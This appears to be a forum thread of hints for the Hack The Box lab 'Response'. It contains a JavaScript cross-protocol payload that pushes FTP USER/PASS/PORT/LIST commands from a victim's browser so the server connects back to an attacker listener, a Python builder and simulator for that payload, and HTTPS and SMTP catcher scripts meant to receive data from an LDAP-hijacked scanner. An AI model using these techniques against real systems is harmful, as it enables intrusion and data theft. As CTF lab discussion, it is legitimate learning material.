Response - HTB [Discussion]
(July 4, 2022, 02:29 PM)OperationBlueSun Wrote:
(July 4, 2022, 07:08 AM)Exa Wrote:
(July 3, 2022, 11:28 PM)OperationBlueSun Wrote:
(July 3, 2022, 09:27 PM)Exa Wrote:
(July 3, 2022, 08:58 PM)OperationBlueSun Wrote: @Exa in what context are you executing the javascript?


You are hosting that file on your own web server and sending bob a link to that file.


Thanks, but no luck. I tried both the captured message format and just the script tags in the message file. I also changed the example ftp port using the formula.


This is the HTML file I used (some parts are redacted):

<html>
  <body>
    <script>
      // The POST body is handed to the FTP control port as raw lines, so every
      // command must end in CRLF. A bare multi-line string literal is a JS
      // syntax error, so the payload is built by concatenation instead.
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http://172.18.###.###:2121/", true);
      // x-www-form-urlencoded is a CORS "simple" content type: no preflight is sent.
      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
      // Open a netcat listener on port 3333 (13*256+5).
      xhr.send(
        "USER ftp_user\r\n" +
        "PASS ############\r\n" +
        "PORT 10,10,###,###,13,5\r\n" +
        "LIST\r\n"
      );
    </script>
  </body>
</html>


@Exa Thanks! I wasn't adding proper html tags...

@Exa I have no clue what I'm doing wrong. Bob gets the message from my http server, but I never see a connection attempt to my netcat listener on port 3333. I have no local firewall rules that would interfere and I've never had problems with reverse shells and such. Any hints?
Reply
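For anyone wiring this up, here is an added example of what actually happens on the wire. It is mine, not code from Exa's or OperationBlueSun's posts: the browser's whole HTTP request lands on the FTP control port, a line-oriented server rejects the request line and headers as unknown commands and then honours USER/PASS/PORT/LIST from the body, and the PORT argument carries the callback as four octets plus port/256 and port%256. The toy FTP parser, the minimal HTTP request and every address in it are constructed for the demo.

```python
import ipaddress


def port_argument(ip: str, port: int) -> str:
    """Encode ip:port as the FTP PORT argument h1,h2,h3,h4,p1,p2 (port = p1*256 + p2)."""
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ",".join(octets + [str(port // 256), str(port % 256)])


def parse_port_argument(arg: str):
    """Inverse of port_argument(); returns (ip, port) or raises ValueError."""
    parts = [int(p) for p in arg.split(",")]
    if len(parts) != 6 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError("malformed PORT argument")
    return ".".join(map(str, parts[:4])), parts[4] * 256 + parts[5]


def build_smuggled_body(user, password, callback_ip, callback_port) -> str:
    """The string xhr.send() must carry: CRLF-terminated FTP commands."""
    commands = (f"USER {user}", f"PASS {password}",
                f"PORT {port_argument(callback_ip, callback_port)}", "LIST")
    return "".join(cmd + "\r\n" for cmd in commands)


def browser_request(host, port, body) -> bytes:
    """Constructed approximation of the request the XHR emits (browsers add more headers)."""
    head = (f"POST / HTTP/1.1\r\nHost: {host}:{port}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return (head + body).encode()


def simulate_ftp(raw: bytes):
    """Toy FTP control-channel parser: one command per line, as a real server reads it.

    Returns (replies, data_target): data_target is the ip:port the server would
    dial for LIST, i.e. where the netcat listener must be waiting."""
    replies, authed, target = [], False, None
    for line in raw.decode(errors="replace").split("\r\n"):
        if not line:
            continue  # the blank line separating HTTP headers from the body
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "USER":
            replies.append("331 Please specify the password.")
        elif verb == "PASS":
            authed = True  # toy server: any password is accepted
            replies.append("230 Login successful.")
        elif verb == "PORT" and authed:
            try:
                target = parse_port_argument(arg)
                replies.append("200 PORT command successful.")
            except ValueError:
                replies.append("501 Syntax error in parameters.")
        elif verb == "LIST" and authed:
            replies.append("150 Here comes the directory listing." if target
                           else "425 Use PORT or PASV first.")
        else:
            # The HTTP request line and every header land here and are ignored.
            replies.append("500 Unknown command.")
    return replies, target


if __name__ == "__main__":
    body = build_smuggled_body("ftp_user", "secret", "10.10.14.5", 3333)
    replies, target = simulate_ftp(browser_request("172.18.0.2", 2121, body))
    print("\n".join(replies))
    print("server would connect back to", target)
```

Three things worth checking against your own setup: the body lines have to be joined with CRLF, otherwise the server sees one long garbage command; the form content type is what keeps the request a CORS "simple request" so the browser sends it without a preflight; and browsers refuse to connect to port 21 at all, which is why a non-standard FTP port like 2121 is reachable from a script. The callback itself is an outbound connection made by the FTP server to the address in PORT, so the listener only ever fires if that server can route to your IP.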
@OperationBlueSun I sent you a DM.
Reply
I tried changing scryh's password using ldappasswd with admin creds and then using su, but it didn't work... the password is not valid. Anyone have any luck? On second thought, it doesn't look like ldap is being used to manage Linux or ssh logons.
Reply
We know we can repurpose ldap, but to steal scryh's data from where? nmap needs an https server... a bit lost here. My thinking hat is still charging.
Reply
(July 3, 2022, 09:08 PM)undeadly Wrote:
(July 3, 2022, 12:14 PM)Cipher Wrote: Anyone have the root key or root hash?


Exploitation from bob -> scryh isn't that trivial. This is exactly why this box is insane level, and it's really insane...
The root hash doesn't really help you. Or just wait for some new shiny exploit for linux to pop up.

I've already done user but I haven't gotten the root flag for a long time. I am tired of this machine, so I just want the root hash to learn something. I don't want to leave this machine. If you give me a hint that's enough for me. Can you give me a hint for this machine?
Thanks
Reply
(July 6, 2022, 05:56 PM)OperationBlueSun Wrote: I tried changing scryh's password using ldappasswd with admin creds and then using su, but it didn't work... the password is not valid. Anyone have any luck? On second thought, it doesn't look like ldap is being used to manage Linux or ssh logons.


Any new findings ?
You're right, ldap doesn't set the /etc/shadow password nor ssh keys. So my guess is we have to use ldap to make scan.sh scan something else and then send a report back to our own smtp server.
There's also a difference in the original ssl-cert.nse and the one in scryh's scripts directory. Might be something interesting here

Update: I think I found the logic, and if I'm right, yeah, this is insane, thus very challenging!
Reply
A lot of interesting comments were already made by @toatoat;
read his posts more carefully.

ldap here is only for chat users' auth, but in this scheme ldap is the only thing you may repurpose.
Try searching for ldap injections and ldap attacks (you should already have the admin passwd for ldap).
It should finally point back to your instances of smtp, dns, https servers.
Look for what you may change in ldap and how to make it point back to you.

For the https "server" you could use this simple script, which I used for the EarlyAccess machine (already retired now) + gen your own custom ssl keys:

import http.server, ssl

# https_svr_key.pem must hold both the certificate and its private key, e.g.:
#   openssl req -x509 -newkey rsa:2048 -nodes -days 30 -subj '/CN=whatever' \
#       -keyout key.pem -out cert.pem && cat cert.pem key.pem > https_svr_key.pem
server_address = ('0.0.0.0', 4443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
# ssl.wrap_socket() was deprecated in 3.7 and removed in 3.12; use an SSLContext.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile='https_svr_key.pem')
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()

Reply
(July 8, 2022, 04:15 PM)undeadly Wrote: A lot of interesting comments were already made by @toatoat

Already got ldap hijacked and the https server running. smtp is next. Proofing and playing around :D
Reply
(July 8, 2022, 07:10 PM)yournamehere Wrote:
(July 8, 2022, 04:15 PM)undeadly Wrote: A lot of interesting comments were already made by @toatoat

Already got ldap hijacked and the https server running. smtp is next. Proofing and playing around :D


You could try this one -> https://github.com/ankraft/smtpproxy
Reply
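Since the plan discussed above is to have scan.sh mail its report to a server you control, here is an added example of a stdlib-only SMTP catcher. It is my own code, not from any post in this thread and not the smtpproxy project linked above. The session state machine is a pure function, so the exchange can be checked offline against a constructed transcript, and the same class backs a threaded socket server when the file is run. The listen address, hostname and sample transcript are assumptions made for the demo.

```python
import socketserver

LISTEN = ("0.0.0.0", 2525)  # assumption: high port; use 25 (as root) or redirect to it


class SmtpSession:
    """State machine for one SMTP session, fed one command line at a time, no I/O."""

    def __init__(self, hostname="catcher.local"):  # hostname is a constructed value
        self.hostname = hostname
        self.sender, self.rcpts, self.data = None, [], None
        self.messages = []  # captured (sender, rcpts, body) tuples

    def feed(self, line: str) -> str:
        if self.data is not None:  # inside DATA: collect until the lone "."
            if line == ".":
                self.messages.append((self.sender, self.rcpts, "\n".join(self.data)))
                self.sender, self.rcpts, self.data = None, [], []
                self.data = None
                return "250 2.0.0 Ok: queued"
            # Dot-stuffing (RFC 5321 4.5.2): the client doubles a leading "."
            self.data.append(line[1:] if line.startswith("..") else line)
            return ""
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("EHLO", "HELO"):
            return f"250 {self.hostname}"
        if verb == "MAIL":
            self.sender = arg.partition(":")[2].strip()
            return "250 2.1.0 Ok"
        if verb == "RCPT":
            if self.sender is None:
                return "503 5.5.1 Error: need MAIL command"
            self.rcpts.append(arg.partition(":")[2].strip())
            return "250 2.1.5 Ok"
        if verb == "DATA":
            if not self.rcpts:
                return "503 5.5.1 Error: need RCPT command"
            self.data = []
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "502 5.5.2 Error: command not recognized"


def run_session(lines):
    """Feed a whole client transcript; return (non-empty replies, captured messages)."""
    session = SmtpSession()
    replies = [r for r in (session.feed(line) for line in lines) if r]
    return replies, session.messages


class Handler(socketserver.StreamRequestHandler):
    def handle(self):
        session = SmtpSession()
        self.wfile.write(b"220 catcher.local ESMTP\r\n")  # banner the client waits for
        for raw in self.rfile:
            reply = session.feed(raw.decode(errors="replace").rstrip("\r\n"))
            if reply:
                self.wfile.write((reply + "\r\n").encode())
            if reply.startswith("221"):
                break
        for sender, rcpts, body in session.messages:
            print(f"--- mail from {sender} to {rcpts} ---\n{body}\n")


if __name__ == "__main__":
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    with socketserver.ThreadingTCPServer(LISTEN, Handler) as srv:
        srv.serve_forever()
```

Whatever mailer the target uses, it will wait for the 220 banner, the 354 after DATA and correct handling of the terminating dot, which is exactly what a bare netcat listener gets wrong when people try to "catch" mail with it. Anything this toy does not implement (STARTTLS, AUTH) comes back as a 502, so if the sender insists on one of those you will see it in the output and know why the report never arrives.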
Any tips for scryh->root? I'm trying to analyze `core.auto_update` with volatility3. I've tried creating symbols for Ubuntu 20.04 5.4.0-109-generic, but the dump is not recognized.
Reply